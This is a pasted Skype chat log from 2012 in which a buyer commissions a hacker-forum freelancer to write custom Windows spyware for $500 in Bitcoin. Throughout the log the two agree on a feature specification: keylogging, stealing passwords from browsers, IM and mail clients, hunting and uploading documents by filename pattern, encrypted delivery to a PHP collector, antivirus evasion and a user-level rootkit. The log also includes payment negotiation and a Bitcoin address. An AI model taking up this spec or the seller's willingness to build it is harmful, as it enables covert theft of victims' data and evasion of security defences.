Public Pastes
Pastebin PRO Accounts EASTER SPECIAL! For a limited time only get 40% discount on a LIFETIME PRO account! Offer Ends April 2nd!
SHARE
TWEET

Untitled

a guest Dec 20th, 2012 1,317 Never
  1. [11/26/2012 10:16:04 PM] ' Tweety HF;: Hi shelly.bongo! I’d like to add you on Skype. ' Tweety HF;
  2. [11/26/2012 10:16:04 PM] Shelly Bongo: Shelly Bongo has shared contact details with ' Tweety HF;.
  3. [11/26/2012 10:16:11 PM] Shelly Bongo: hi
  4. [11/26/2012 10:16:20 PM] ' Tweety HF;: Hey.
  5. [11/26/2012 10:16:41 PM] Shelly Bongo: so
  6. [11/26/2012 10:17:07 PM] Shelly Bongo: i'm looking for a stable keylogger combined with recovery of popular apps AND a special file stealer feature
  7. [11/26/2012 10:17:19 PM] ' Tweety HF;: Sure I can do that.
  8. [11/26/2012 10:17:53 PM] Shelly Bongo: are you in any way affiliated with any police, federal or government entity?
  9. [11/26/2012 10:18:10 PM] ' Tweety HF;: Nope.
  10. [11/26/2012 10:18:29 PM] Shelly Bongo: do you have experience writing malware?
  11. [11/26/2012 10:18:33 PM] ' Tweety HF;: Yes.
  12. [11/26/2012 10:18:39 PM] Shelly Bongo: i approached mephobia because of his rep in forums
  13. [11/26/2012 10:18:47 PM] Shelly Bongo: could you link me to some of your work if possible?
  14. [11/26/2012 10:18:54 PM] ' Tweety HF;: I have written an Advanced Worm, Downloader and IRC Bot
  15. [11/26/2012 10:19:06 PM] ' Tweety HF;: My work is strictly private for customers so I have no links.
  16. [11/26/2012 10:19:15 PM] ' Tweety HF;: I can show you some stuff over TV?
  17. [11/26/2012 10:19:21 PM] Shelly Bongo: over TV ?
  18. [11/26/2012 10:19:38 PM] ' Tweety HF;: Teamviewer.
  19. [11/26/2012 10:21:10 PM] Shelly Bongo: i like to keep things segragated, teamviewer is too direct.
  20. [11/26/2012 10:21:16 PM] Shelly Bongo: VNC possible?
  21. [11/26/2012 10:21:21 PM] ' Tweety HF;: Never heard of it lol.
  22. [11/26/2012 10:21:32 PM] Shelly Bongo: ?
  23. [11/26/2012 10:21:38 PM] Shelly Bongo: you have never heard of vnc?
  24. [11/26/2012 10:21:41 PM] ' Tweety HF;: Nope
  25. [11/26/2012 10:21:48 PM] Shelly Bongo: weird.
  26. [11/26/2012 10:22:15 PM] ' Tweety HF;: Teamviewer should be fine. Just use a VPN.
  27. [11/26/2012 10:32:57 PM] Shelly Bongo: okay
  28. [11/26/2012 10:32:59 PM] Shelly Bongo: lets do it
  29. [11/26/2012 10:34:36 PM] ' Tweety HF;: 234 791 527
  30. [11/26/2012 10:34:39 PM] ' Tweety HF;: 6641
  31. [11/26/2012 10:35:33 PM] ' Tweety HF;: I made a crypter a while ago
  32. [11/26/2012 10:35:55 PM] Shelly Bongo: run it plz
  33. [11/26/2012 10:37:09 PM] ' Tweety HF;: Thats the crypter, this is the worm
  34. [11/26/2012 10:37:59 PM] Shelly Bongo: made any trojans/loggers?
  35. [11/26/2012 10:38:12 PM] ' Tweety HF;: This is essentially a trojan
  36. [11/26/2012 10:38:16 PM] ' Tweety HF;: As it makes a backdoor
  37. [11/26/2012 10:38:57 PM] ' Tweety HF;: My most recent malware:
  38. [11/26/2012 10:39:41 PM] ' Tweety HF;: See?
  39. [11/26/2012 10:39:43 PM] ' Tweety HF;: IRC connected
  40. [11/26/2012 10:39:56 PM] Shelly Bongo: yes
  41. [11/26/2012 10:40:08 PM] ' Tweety HF;: this is uploaded exe
  42. [11/26/2012 10:40:41 PM] ' Tweety HF;: it will download and run it hidden
  43. [11/26/2012 10:40:45 PM] ' Tweety HF;: but i will turn hidden off to show you
  44. [11/26/2012 10:42:52 PM] Shelly Bongo: okay i see
  45. [11/26/2012 10:43:16 PM] ' Tweety HF;: My AV stopping the process atm -.-
  46. [11/26/2012 10:43:36 PM] Shelly Bongo: you couldn't FUD it?
  47. [11/26/2012 10:43:48 PM] ' Tweety HF;: It is FUD but i been working on it for a while, avast sent it to their lab
  48. [11/26/2012 10:43:59 PM] ' Tweety HF;: so only 1 detection at the moment lol
  49. [11/26/2012 10:44:05 PM] Shelly Bongo: understood
  50. [11/26/2012 10:44:13 PM] Shelly Bongo: okay, so lets talk details
  51. [11/26/2012 10:44:22 PM] ' Tweety HF;: Sure.
  52. [11/26/2012 10:45:31 PM | Removed 10:45:49 PM] Shelly Bongo: This message has been removed.
  53. [11/26/2012 10:45:54 PM] Shelly Bongo: sec i'll reformat it
  54. [11/26/2012 10:46:30 PM] ' Tweety HF;: ok
  55. [11/26/2012 10:47:26 PM] Shelly Bongo: There is a need for a Windows based keylogger that has the following characteristics:
  56.  
  57. - Log keystrokes
  58.   - Online/offline - stores everything encrypted (e.g. AES-256) in a local hidden file, and deliver the data each X minutes
  59.  
  60. - Recover passwords from popular applications (browsers, IM, etc)
  61.  
  62. - Leak out files
  63.   - Every interval - or X minutes after a computer is idle, the logger should find and send out files matching a certain filename pattern (e.g. documents, presentations, spreadsheets, PDF files) - e.g. starting from the recently opened documents
  64.  
  65. - Delivery should be via HTTP (to a PHP script) - for all delivered data - files/keystrokes/passwords/etc.
  66.  
  67. - It should be stable, not crash (as most bots of the sort do every now and then), be crypt-able (so we can use crypters to make it FUD), and be static - without requiring .Net version X/Y/Z but just work on Windows 32/64
  68.  
  69. I'll need the source code of the end result along with the binaries (builder+ php file used to receive data).
  70. [11/26/2012 10:48:32 PM] ' Tweety HF;: Alright one moment.
  71. [11/26/2012 10:48:36 PM] Shelly Bongo: shoot
  72. [11/26/2012 10:50:05 PM] ' Tweety HF;: So you want me to write it in C?
  73. [11/26/2012 10:50:46 PM] Shelly Bongo: i think .net framework is installed into all windows versions now
  74. [11/26/2012 10:50:52 PM] Shelly Bongo: either 1.1 or 2.0
  75. [11/26/2012 10:50:54 PM] ' Tweety HF;: Yes it is.
  76. [11/26/2012 10:50:55 PM] Shelly Bongo: doesn't have to be C
  77. [11/26/2012 10:50:55 PM] ' Tweety HF;: 2.0
  78. [11/26/2012 10:51:02 PM] ' Tweety HF;: So you wouldnt mind 2.0?
  79. [11/26/2012 10:51:09 PM] Shelly Bongo: let me run some checks
  80. [11/26/2012 10:51:21 PM] ' Tweety HF;: Alright.
  81. [11/26/2012 10:52:19 PM] Shelly Bongo: hmmm seems like XP doesn't have any version installed (in all SPs neither)
  82. [11/26/2012 10:52:54 PM] Shelly Bongo: perhaps it's possible to bundle a .net 2.0 installer in silent mode in case it's not installed?
  83. [11/26/2012 10:52:55 PM] ' Tweety HF;: XP SP 1 has it lol.
  84. [11/26/2012 10:54:05 PM] Shelly Bongo: nope, it's not installed by default.
  85. [11/26/2012 10:54:09 PM] ' Tweety HF;: http://www.microsoft.com/en-us/download/details.aspx?id=16614
  86. [11/26/2012 10:54:12 PM] Shelly Bongo: is the silent installer possible?
  87. [11/26/2012 10:54:14 PM] ' Tweety HF;: It is in the updates.
  88. [11/26/2012 10:54:19 PM] ' Tweety HF;: Yeah I can do a silent installer too.
  89. [11/26/2012 10:54:51 PM] Shelly Bongo: this link shows the SP1 update FOR .net framework, not .net framework FROM the winxp SP1 update..
  90. [11/26/2012 10:54:52 PM] Shelly Bongo: okay
  91. [11/26/2012 10:54:57 PM] Shelly Bongo: so slap the silent installer in
  92. [11/26/2012 10:55:12 PM] ' Tweety HF;: I will code the silent installer in C
  93. [11/26/2012 10:55:35 PM] Shelly Bongo: the builder should support a list of patterns for the files, e.g. "*.ppt, *.pptx, *finance*.*"
  94. [11/26/2012 10:55:42 PM] Shelly Bongo: and steal those
  95. [11/26/2012 10:55:45 PM] ' Tweety HF;: You want a builder too?
  96. [11/26/2012 10:56:14 PM] Shelly Bongo: actually no it's not necessary, source is sufficient, as long as it's coded in an easy to change way
  97. [11/26/2012 10:56:30 PM] ' Tweety HF;: Yes I have clean sources, easy to modify and rebuild.
  98. [11/26/2012 10:56:51 PM] Shelly Bongo: should i expect the end result to spawn out somewhere?
  99. [11/26/2012 10:57:10 PM] Shelly Bongo: meaning, the product of this work, at a future time, leaking out.
  100. [11/26/2012 10:57:24 PM] ' Tweety HF;: Nope. I keep all my clients work 100% private.
  101. [11/26/2012 10:57:28 PM] ' Tweety HF;: I will not keep a copy.
  102. [11/26/2012 10:57:46 PM] Shelly Bongo: you will delete the copy after you send it to me?
  103. [11/26/2012 10:58:03 PM] ' Tweety HF;: Yes.
  104. [11/26/2012 10:58:34 PM] Shelly Bongo: i have worked with suppliers before, the good and the bad, sounds a bit too good to be true, but we'll plow through it.
  105. [11/26/2012 10:59:03 PM] ' Tweety HF;: You can ask around if you like, I am well known and I have satisfied nearly all my clients.
  106. [11/26/2012 11:00:03 PM] Shelly Bongo: about the file stleaer - it should start looking in "Recently Opened Documents", and once it's done search My Documents, and then the HD - the source should have an ordered list of the directories to scan, supprting things like %appdata% etc
  107. [11/26/2012 11:00:27 PM] ' Tweety HF;: Yeah no problem.
  108. [11/26/2012 11:00:28 PM] Shelly Bongo: once a file is found matching a pattern, it should be zipped and uploaded
  109. [11/26/2012 11:00:45 PM] Shelly Bongo: of course we're talking about a filename pattern, not data pattern from within the file
  110. [11/26/2012 11:01:17 PM] ' Tweety HF;: Can you elaborate?
  111. [11/26/2012 11:01:32 PM] Shelly Bongo: i mean, the file stealer should find and match by filenames
  112. [11/26/2012 11:01:40 PM] Shelly Bongo: not by the data within files
  113. [11/26/2012 11:01:48 PM] Shelly Bongo: e.g. it should look at the name of the file rather than its contents
  114. [11/26/2012 11:02:11 PM] ' Tweety HF;: But what is it looking for exactly?
  115. [11/26/2012 11:02:26 PM] Shelly Bongo: [Monday, November 26, 2012 10:55 PM] Shelly Bongo:
  116.  
  117. <<< the builder should support a list of patterns for the files, e.g. "*.ppt, *.pptx, *finance*.*"
  118. [11/26/2012 11:02:36 PM] Shelly Bongo: replace 'builder' with 'source'
  119. [11/26/2012 11:02:36 PM] ' Tweety HF;: Alright I see.
  120. [11/26/2012 11:02:47 PM] Shelly Bongo: okay
  121. [11/26/2012 11:02:49 PM] Shelly Bongo: so
  122. [11/26/2012 11:02:57 PM] Shelly Bongo: file stealer we discussed
  123. [11/26/2012 11:03:02 PM] ' Tweety HF;: Yes
  124. [11/26/2012 11:03:05 PM] Shelly Bongo: keylogger - the regular deal...
  125. [11/26/2012 11:03:09 PM] ' Tweety HF;: mhm.
  126. [11/26/2012 11:03:14 PM] ' Tweety HF;: Screenshots as well yeah?
  127. [11/26/2012 11:03:26 PM] ' Tweety HF;: System info + browser stealers.
  128. [11/26/2012 11:03:49 PM] Shelly Bongo: screenshot - yes, everything should be configurable of course (interval of screenshots, disable, etc)
  129. [11/26/2012 11:04:02 PM] Shelly Bongo: sysinfo - yes
  130. [11/26/2012 11:04:08 PM] ' Tweety HF;: Yes.
  131. [11/26/2012 11:04:13 PM] Shelly Bongo: regarding the stealers - i want more than browsers
  132. [11/26/2012 11:04:22 PM] Shelly Bongo: IM - skype, icq, msn, yahoo
  133. [11/26/2012 11:04:37 PM] Shelly Bongo: outlook/thunderbird
  134. [11/26/2012 11:04:42 PM] ' Tweety HF;: Alright.
  135. [11/26/2012 11:04:59 PM] Shelly Bongo: and browsers - IE, FF, chrome, safari
  136. [11/26/2012 11:05:31 PM] Shelly Bongo: Mephobia probably has all the code ready for that
  137. [11/26/2012 11:05:33 PM] Shelly Bongo: :)
  138. [11/26/2012 11:06:19 PM] ' Tweety HF;: I made previous stealers before so I can provide.
  139. [11/26/2012 11:06:25 PM] Shelly Bongo: great
  140. [11/26/2012 11:06:42 PM] Shelly Bongo: now, how long do you reckon this will take?
  141. [11/26/2012 11:06:52 PM] Shelly Bongo: it should work on Vista/7/XP, 32 & 64
  142. [11/26/2012 11:07:21 PM] ' Tweety HF;: A week at max I think.
  143. [11/26/2012 11:07:27 PM] Shelly Bongo: for the whole thing?
  144. [11/26/2012 11:07:27 PM] ' Tweety HF;: I just need time to test everything.
  145. [11/26/2012 11:07:28 PM] ' Tweety HF;: Yes.
  146. [11/26/2012 11:07:48 PM] ' Tweety HF;: Windows xp/7/8 + 32/64/86 bit architecture
  147. [11/26/2012 11:08:00 PM] ' Tweety HF;: thats 9 OS's all together + Windows Servers.
  148. [11/26/2012 11:08:09 PM] ' Tweety HF;: I can do it.
  149. [11/26/2012 11:08:18 PM] ' Tweety HF;: Is 1 week long enough?
  150. [11/26/2012 11:08:41 PM] Shelly Bongo: there is no strict time pressure for now, so it is fine
  151. [11/26/2012 11:08:48 PM] Shelly Bongo: price?
  152. [11/26/2012 11:10:38 PM] ' Tweety HF;: Well what is your budget?
  153. [11/26/2012 11:11:06 PM] Shelly Bongo: i have exactly $500, in BTC
  154. [11/26/2012 11:12:36 PM] ' Tweety HF;: Wait do you want a ring3 rootkit as well?
  155. [11/26/2012 11:12:45 PM] Shelly Bongo: ring0 you mean.
  156. [11/26/2012 11:12:57 PM] ' Tweety HF;: Ring0 is going to cost you the whole boat
  157. [11/26/2012 11:13:14 PM] Shelly Bongo: what's a ring3 rootkit?
  158. [11/26/2012 11:13:22 PM] ' Tweety HF;: Ring3 is user level.
  159. [11/26/2012 11:13:28 PM] ' Tweety HF;: Ring0 is kernel level
  160. [11/26/2012 11:13:38 PM] Shelly Bongo: yes, how can a rootkit run in user level..
  161. [11/26/2012 11:13:54 PM] ' Tweety HF;: Remember, I write all my sources and do not use any sources apart from the one I write meaning 100% FUD andcustome.
  162. [11/26/2012 11:13:56 PM] ' Tweety HF;: custom*
  163. [11/26/2012 11:14:13 PM] ' Tweety HF;: rootkit can run in user level by exploiting the users privellages
  164. [11/26/2012 11:14:17 PM] Shelly Bongo: obviously, this needs to be a hidden process (e.g. inject itself somewhere), and undetectable
  165. [11/26/2012 11:14:32 PM] ' Tweety HF;: Yes I can do that no problem.
  166. [11/26/2012 11:14:36 PM] Shelly Bongo: this tool should work for non-administrator users
  167. [11/26/2012 11:14:58 PM] ' Tweety HF;: Yeah the ring3 rootkit will hook into system processes and elevate the rights.
  168. [11/26/2012 11:15:28 PM] Shelly Bongo: why do i need the ring3 rootkit here though? at all i mean
  169. [11/26/2012 11:16:00 PM] ' Tweety HF;: ring3 will make it so even non admin users accounts will be infected and hooked to distribute the malware within the system.
  170. [11/26/2012 11:16:36 PM] Shelly Bongo: what's the price with/without it?
  171. [11/26/2012 11:16:48 PM] Shelly Bongo: will adding it increase risk of being detected?
  172. [11/26/2012 11:17:04 PM] ' Tweety HF;: Ring0 rootkits, well private ones are 1-4 grand for the source.
  173. [11/26/2012 11:17:22 PM] ' Tweety HF;: Ring3 is generally round $300-600 depending on if it is FUD
  174. [11/26/2012 11:17:49 PM] ' Tweety HF;: I made a ring3 before and it is still FUD
  175. [11/26/2012 11:17:54 PM] ' Tweety HF;: So I can throw that in their
  176. [11/26/2012 11:18:41 PM] Shelly Bongo: okay
  177. [11/26/2012 11:19:12 PM] Shelly Bongo: i have been scammed by a russian service provider of this sort not long ago
  178. [11/26/2012 11:19:14 PM] ' Tweety HF;: Do you want a custom ring3 or the ring3 I made? It has not been used yet I just made it but did not sell.
  179. [11/26/2012 11:19:18 PM] Shelly Bongo: and do not intend on that happenning again
  180. [11/26/2012 11:19:23 PM] ' Tweety HF;: No problem.
  181. [11/26/2012 11:19:34 PM] Shelly Bongo: so we will need to structure this in a way where i pay most of the some once it is ready
  182. [11/26/2012 11:19:54 PM] ' Tweety HF;: Perfectly fine with me.
  183. [11/26/2012 11:20:02 PM] ' Tweety HF;: I understand how you feel about this kind of stuff.
  184. [11/26/2012 11:21:42 PM] ' Tweety HF;: You need to understand that I, as a freelancer have had many people ask to do work and in the end they find someone else or do not purchase the product in question after all my work goes into it.
  185. [11/26/2012 11:22:37 PM] ' Tweety HF;: 40% now 60% when completed works for you?
  186. [11/26/2012 11:23:02 PM] Shelly Bongo: sorry, i have to go for 20minutes
  187. [11/26/2012 11:23:05 PM] Shelly Bongo: be back later to continue
  188. [11/26/2012 11:23:06 PM] ' Tweety HF;: No problem.
  189. [11/26/2012 11:36:57 PM] Shelly Bongo: back.
  190. [11/26/2012 11:37:32 PM] Shelly Bongo: first of all, we agreed on the contents, delivery time (~week) and price ($500)?
  191. [11/26/2012 11:38:17 PM] ' Tweety HF;: Yes.
  192. [11/26/2012 11:38:20 PM] Shelly Bongo: how soon can you start?
  193. [11/26/2012 11:38:46 PM] ' Tweety HF;: I will start tonight.
  194. [11/26/2012 11:38:48 PM] Shelly Bongo: i pay in Bitcoin, is that a problem?
  195. [11/26/2012 11:39:01 PM] ' Tweety HF;: Unfortunatly it is. Can you pay by LR?
  196. [11/26/2012 11:39:05 PM] Shelly Bongo: no
  197. [11/26/2012 11:39:25 PM] Shelly Bongo: WU is an option, though one I do not like to use
  198. [11/26/2012 11:39:57 PM] ' Tweety HF;: Fee's are disgraceful. I know a legit exchanger that has done over $800 of exchanges with me who can help out.
  199. [11/26/2012 11:39:57 PM] Shelly Bongo: anonymity is important to me.
  200. [11/26/2012 11:39:58 PM] ' Tweety HF;: Interested?
  201. [11/26/2012 11:40:37 PM] Shelly Bongo: i don't understand what you're offering
  202. [11/26/2012 11:40:56 PM] ' Tweety HF;: You pay using BTC to an exchanger and he sends LR to me.
  203. [11/26/2012 11:41:17 PM] ' Tweety HF;: He is staff member on the forums
  204. [11/26/2012 11:41:20 PM] Shelly Bongo: as long as the price remains the same, and you trust the exchanger, fine by me.
  205. [11/26/2012 11:41:35 PM] ' Tweety HF;: Alright.
  206. [11/26/2012 11:41:42 PM] ' Tweety HF;: so 40% is fine?
  207. [11/26/2012 11:41:48 PM] ' Tweety HF;: And 60% when I am done.
  208. [11/26/2012 11:41:49 PM] Shelly Bongo: i was saving this for last
  209. [11/26/2012 11:41:59 PM] Shelly Bongo: 40% of $500 is way too much
  210. [11/26/2012 11:42:41 PM] Shelly Bongo: i can do 10% up front, then add until 40% in 2 days, after you show me progress in TV
  211. [11/26/2012 11:42:49 PM] Shelly Bongo: meaning, show code, show what's the status etc.
  212. [11/26/2012 11:42:53 PM] Shelly Bongo: and the rest when you're done.
  213. [11/26/2012 11:43:53 PM] ' Tweety HF;: Exchangers cost per transfer, the transfer fee will be coming out of my side thats why I wanted to do 40%. Of course if we do it this way you will get daily updates from me. Meph can vouch for my skills as well as delivery.
  214. [11/26/2012 11:44:06 PM] ' Tweety HF;: It seems reasonable to me.
  215. [11/26/2012 11:45:12 PM] Shelly Bongo: i can settle on 25% - i understand your points, however i cannot afford to take risks as i need this budget to get the project done
  216. [11/26/2012 11:45:43 PM] Shelly Bongo: with all due respect to Meph, i've only known him for 1 hour.
  217. [11/26/2012 11:45:59 PM] ' Tweety HF;: Oh.
  218. [11/26/2012 11:46:00 PM] ' Tweety HF;: I see.
  219. [11/26/2012 11:46:09 PM] ' Tweety HF;: http://www.hackforums.net/member.php?action=profile&uid=1234585
  220. [11/26/2012 11:46:12 PM] ' Tweety HF;: My HF profile.
  221. [11/26/2012 11:46:23 PM] ' Tweety HF;: You can go through my rep as well as my threads/posts.
  222. [11/26/2012 11:46:31 PM] ' Tweety HF;: I am not the type of person to let you down.
  223. [11/26/2012 11:48:32 PM] Shelly Bongo: okay, lets do 30% - that's $150 USD
  224. [11/26/2012 11:48:43 PM] ' Tweety HF;: Alright.
  225. [11/26/2012 11:49:36 PM] Shelly Bongo: please provide the BC address to wire this to through your exchanger
  226. [11/26/2012 11:49:57 PM] ' Tweety HF;: How many coins you sending through?
  227. [11/26/2012 11:50:21 PM] Shelly Bongo: i'll check
  228. [11/26/2012 11:50:22 PM] Shelly Bongo: sec
  229. [11/26/2012 11:50:28 PM] ' Tweety HF;: Ok
  230. [11/27/2012 12:03:06 AM] ' Tweety HF;: I'll be back in 15 minutes, dinner.
  231. [11/27/2012 12:17:21 AM] Shelly Bongo: it's going to be 12.x BTCs
  232. [11/27/2012 12:17:40 AM] ' Tweety HF;: Alright.
  233. [11/27/2012 12:17:45 AM] Shelly Bongo: whatever is the rate at the time of transfer (determining the .x)
  234. [11/27/2012 12:17:52 AM] Shelly Bongo: worth of $150 usd
  235. [11/27/2012 12:18:11 AM] ' Tweety HF;: thats $30 for transferring thats coming out of my side.
  236. [11/27/2012 12:18:44 AM] Shelly Bongo: it costs you $30 just to convert it to LR?
  237. [11/27/2012 12:19:03 AM] ' Tweety HF;: Yes.
  238. [11/27/2012 12:19:49 AM] ' Tweety HF;: Address: 16oVdzCKfEBMLobuxuXgg9jKvgRVxTLEAp
  239. [11/27/2012 12:20:36 AM] ' Tweety HF;: [Tuesday, November 27, 2012 12:16 AM] Xch4ng3:
  240.  
  241. <<< 16oVdzCKfEBMLobuxuXgg9jKvgRVxTLEAp
  242. [11/27/2012 12:22:52 AM] Shelly Bongo: got it
  243. [11/27/2012 12:22:59 AM] ' Tweety HF;: Sec.
  244. [11/27/2012 12:23:12 AM] Shelly Bongo: i am loading my BT account, and will transfer the sum as it's ready
  245. [11/27/2012 12:23:20 AM] ' Tweety HF;: Alright.
  246. [11/27/2012 12:30:05 AM] Shelly Bongo: seems like my exchanger is having tech problems, i'll write to you when it works, this happened to me before an it had to be around 8 hours until they fixed it... hope it will be faster
  247. [11/27/2012 1:04:49 AM] Shelly Bongo: okay, expect this to happen tomorrow, it won't happen today
  248. [11/27/2012 1:04:55 AM] ' Tweety HF;: Alright.
  249. [11/27/2012 4:06:39 PM] Shelly Bongo: are you there?
  250. [11/27/2012 7:16:08 PM] ' Tweety HF;: I am online.
  251. [11/27/2012 7:24:31 PM] Shelly Bongo: hi, i'll be here in around 5 hours, if you are around then  i'll make the transfer
  252. [11/27/2012 7:24:42 PM] ' Tweety HF;: Alright.
  253. [11/27/2012 8:52:31 PM] Shelly Bongo: okay, i will send the payment soon - it's the same BT address you gave me yesterday?
  254. [11/27/2012 8:52:39 PM] ' Tweety HF;: Yes.
  255. [11/27/2012 8:53:11 PM] ' Tweety HF;: How many coins?
  256. [11/27/2012 8:54:24 PM] Shelly Bongo: okay, just sent
  257. [11/27/2012 8:54:26 PM] Shelly Bongo: 12.5 BTC
  258. [11/27/2012 8:54:41 PM] Shelly Bongo: under the exchange rate of $12 usd for 1 btc, total $150 usd
  259. [11/27/2012 8:54:48 PM] ' Tweety HF;: Alright just confirming to my exchanger.
  260. [11/27/2012 8:55:46 PM] ' Tweety HF;: Give me a sec I will ring him up now.
  261. [11/27/2012 8:56:03 PM] Shelly Bongo: sure, but wait for it to be confirmed, it will take a few minutes i gather
  262. [11/27/2012 10:22:54 PM] Shelly Bongo: it has been fully verified, what's the status on your end?
  263. [11/27/2012 10:23:30 PM] ' Tweety HF;: My exchanger will be on in in a few hours. I will start on it once it is confirmed.
  264. [11/27/2012 10:23:36 PM] ' Tweety HF;: Also can you send your HF profile link.
  265. [11/27/2012 10:37:18 PM] Shelly Bongo: http://www.hackforums.net/member.php?action=profile&uid=1440454
  266. [11/28/2012 1:15:50 AM] Shelly Bongo: hi?
  267. [11/28/2012 10:29:31 AM] ' Tweety HF;: Sorry I need to run off to work. I have recieved the payment. I am starting on the project as well.
  268. [11/28/2012 9:34:56 PM] ' Tweety HF;: Hi.
  269. [11/28/2012 9:35:03 PM] Shelly Bongo: Hi there
  270. [11/28/2012 9:35:05 PM] Shelly Bongo: how're things?
  271. [11/28/2012 9:35:10 PM] ' Tweety HF;: Been waiting for you all day lol.
  272. [11/28/2012 9:35:21 PM] ' Tweety HF;: I finished the rootkit module.
  273. [11/28/2012 9:35:40 PM] Shelly Bongo: the one you said you already have prepared? (ring3)
  274. [11/28/2012 9:35:42 PM] ' Tweety HF;: I need to work on keyboard hooks and a native processor
  275. [11/28/2012 9:36:04 PM] ' Tweety HF;: Yes but I will be stripping the uneccasry components.
  276. [11/28/2012 9:36:15 PM] Shelly Bongo: good to hear
  277. [11/28/2012 9:36:43 PM] ' Tweety HF;: Also you will need to give it a name.
  278. [11/28/2012 9:37:24 PM] Shelly Bongo: i tried some other 'commercial' loggers, while some are FUD in terms of file scanning, all are easily caught in real-time (execution) - or when they attempt to communicate with the internet
  279. [11/28/2012 9:37:52 PM] ' Tweety HF;: I see.
  280. [11/28/2012 9:38:13 PM] Shelly Bongo: today, for example, AVG Internet Security 2013 caught a 100% FUD (in scan-mode) logger... with some heuristics, and also due to the fact it saw it communicating outbound
  281. [11/28/2012 9:39:02 PM] Shelly Bongo: what are your thoughts on evading such detection?
  282. [11/28/2012 9:39:05 PM] ' Tweety HF;: I can bypass them.
  283. [11/28/2012 9:39:37 PM] Shelly Bongo: do you plan on testing the final product vs. such solutions to ensure it evades them?
  284. [11/28/2012 9:40:14 PM] Shelly Bongo: regarding the name - it has little significance since this is not a product i aim to sell
  285. [11/28/2012 9:40:38 PM] Shelly Bongo: besides, whatever name is given - it can be easily changed in the source
  286. [11/28/2012 9:40:41 PM] Shelly Bongo: so, you give it a name
  287. [11/28/2012 9:40:42 PM] Shelly Bongo: :)
  288. [11/28/2012 9:40:59 PM] ' Tweety HF;: Yes each VM has 3 different AV's which I test under sonar radiars and runtime scanners.
  289. [11/28/2012 9:41:01 PM] ' Tweety HF;: Sure.
  290. [11/28/2012 9:44:05 PM] Shelly Bongo: regarding the delivery mode (to some php script) - can you make sure it supports https?
  291. [11/28/2012 9:44:34 PM] ' Tweety HF;: Why would it need https?
  292. [11/28/2012 9:45:17 PM] Shelly Bongo: files/keystrokes/passwords are delivered to a PHP script i specify
  293. [11/28/2012 9:45:21 PM] Shelly Bongo: remotely
  294. [11/28/2012 9:45:58 PM] Shelly Bongo: i prefer to have the option to work with https://*/upload.php - so anyone with wireshark won't be able to spot what's going on
  295. [11/28/2012 9:46:34 PM] ' Tweety HF;: That wont make any difference because the PHP file I will write for you will have a decode and hashing system with a salt
  296. [11/28/2012 9:46:47 PM] ' Tweety HF;: the data packets will be encrypted BEFORE sent to the php file
  297. [11/28/2012 9:46:51 PM] Shelly Bongo: okay, understood
  298. [11/28/2012 9:46:54 PM] ' Tweety HF;: The php file will decipher it in the server
  299. [11/28/2012 9:46:56 PM] ' Tweety HF;: :)
  300. [11/28/2012 9:46:57 PM] Shelly Bongo: that's better
  301. [11/28/2012 9:47:10 PM] Shelly Bongo: avoid the lag of https.
  302. [11/28/2012 9:47:16 PM | Removed 9:47:26 PM] Shelly Bongo: This message has been removed.
  303. [11/28/2012 9:47:27 PM] ' Tweety HF;: It basically means, if somebody sees the connection they cannot sniff the packets because its all encrypted
  304. [11/28/2012 9:47:33 PM] ' Tweety HF;: Even wireshare cant do anything :)
  305. [11/28/2012 9:47:36 PM] Shelly Bongo: i understand
  306. [11/28/2012 9:48:07 PM] Shelly Bongo: if you don't mind me asking, what sort of thing do you do for work? you wrote to me you're going to work so i reckon you don't write malware for a living
  307. [11/28/2012 9:48:45 PM] ' Tweety HF;: I own an Accident Management company, Car rental company and this winter I will be launching a web development + graphics company.
  308. [11/28/2012 9:48:56 PM] ' Tweety HF;: And I also do freelancing on the side.
  309. [11/28/2012 9:49:07 PM] Shelly Bongo: busy man
  310. [11/28/2012 9:49:32 PM] Shelly Bongo: i was betting - programmer
  311. [11/28/2012 9:49:49 PM] ' Tweety HF;: I am studying Computer Science in University too :P
  312. [11/28/2012 9:51:56 PM] Shelly Bongo: i don't recall if i told you this, but there will be more projects after this one if this is satisfactory, which i hope it will be
  313. [11/28/2012 9:52:10 PM] ' Tweety HF;: Yeah no problem.
  314. [11/28/2012 10:06:13 PM] ' Tweety HF;: ASCII or UTF8 Encoding?
  315. [11/28/2012 10:19:02 PM] Shelly Bongo: utf-8
  316. [11/28/2012 10:19:19 PM] ' Tweety HF;: Alright.
  317. [11/29/2012 12:30:06 AM] ' Tweety HF;: Finishing off the keyboard hook for the keylogger.
  318. [11/29/2012 12:32:16 AM] Shelly Bongo: great
  319. [11/29/2012 12:33:58 AM] ' Tweety HF;: What stealing functions did you want again?
  320. [11/29/2012 12:35:23 AM] Shelly Bongo: IE/FF/Chrome browsers, IMs like Skype/MSN/Google-Talk/Yahoo-M
  321. [11/29/2012 12:36:05 AM] ' Tweety HF;: Do you want spread functions?
  322. [11/29/2012 12:36:36 AM] Shelly Bongo: + outlook, thunderbird
  323. [11/29/2012 12:36:46 AM] Shelly Bongo: no, no need to spread
  324. [11/29/2012 12:37:03 AM] ' Tweety HF;: You sure?
  325. [11/29/2012 12:37:04 AM] Shelly Bongo: sysinfo, screenies
  326. [11/29/2012 12:37:08 AM] ' Tweety HF;: Alright.
  327. [11/29/2012 12:37:18 AM] ' Tweety HF;: So you want it to be as stealthy as possible?
  328. [11/29/2012 12:37:20 AM] Shelly Bongo: by spread you mean copy itself to usb etc. right?
  329. [11/29/2012 12:38:14 AM] Shelly Bongo: 1) fulfill requirements (key/screen-log, steal passwords, steal files)
  330. [11/29/2012 12:38:19 AM] Shelly Bongo: 2) evade AVs
  331. [11/29/2012 12:38:26 AM] Shelly Bongo: 3) be stealthy
  332. [11/29/2012 12:38:31 AM] Shelly Bongo: priority list
  333. [11/29/2012 12:47:11 AM] ' Tweety HF;: Alright no problem.
  334. [11/29/2012 12:47:25 AM] ' Tweety HF;: And yes, It can spread through Facebook/Twitter/USB/Skype etc.
  335. [11/29/2012 12:47:32 AM] ' Tweety HF;: But I understand you want ti to be stealthy.
  336. [11/29/2012 12:53:41 AM] Shelly Bongo: yes, i need it to be stealthy
  337. [11/29/2012 12:55:04 AM] ' Tweety HF;: Alright no spreaders.
  338. [11/29/2012 1:02:59 AM | Edited 1:03:37 AM] Shelly Bongo: this is not relevant for this project but might be for a future one - have you ever made a RAT, or think you're up for such a task - with a C&C server, a nice UI, etc.?
  339. [11/29/2012 1:03:21 AM] Shelly Bongo: i'm talking about the scale of SpyEye in terms of complexity and functionality
  340. [11/29/2012 1:04:00 AM] ' Tweety HF;: Yeah no problem I can do that.
